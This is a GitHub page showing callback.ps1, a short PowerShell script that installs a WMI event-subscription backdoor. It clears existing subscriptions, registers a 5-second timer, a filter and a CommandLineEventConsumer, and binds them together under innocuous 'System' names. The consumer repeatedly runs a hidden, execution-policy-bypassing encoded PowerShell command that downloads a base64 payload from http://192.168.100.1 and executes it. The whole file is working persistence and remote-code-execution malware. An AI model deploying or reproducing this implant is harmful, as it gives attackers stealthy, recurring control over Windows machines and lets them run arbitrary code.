-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathcallback.ps1
13 lines (13 loc) · 1.24 KB
/
callback.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
gwmi -Namespace root\subscription -Class __TimerInstruction | rwmi
gwmi -Namespace root\subscription -Class __FilterToConsumerBinding | rwmi
gwmi -Namespace root\subscription -Class __EventFilter | rwmi
gwmi -Namespace root\subscription -Class CommandLineEventConsumer | rwmi
$id = [string](Get-Random)
$cmd = "`$i=(New-Object Net.WebClient);`$i.Headers.add('hostid','$id');IEX([Text.Encoding]::Ascii.GetString([Convert]::FromBase64String((`$i.DownloadString('http://192.168.100.1/index.html')))))"
write-host $cmd
$bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
$cmd = [Convert]::ToBase64String($bytes)
Set-WmiInstance -Namespace root\subscription -Class __IntervalTimerInstruction -Arguments @{TimerId="SystemTimer"; IntervalBetweenEvents="5000"}
$f = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{Name="SystemFilter"; QueryLanguage="WQL"; Query="select * from __TimerEvent within 30 where timerid='SystemTimer'"}
$c = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{Name="SystemConsumer"; CommandLineTemplate="powershell -w hidden -ep bypass -nop -EncodedCommand $cmd"}
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{Filter=$f;Consumer=$c}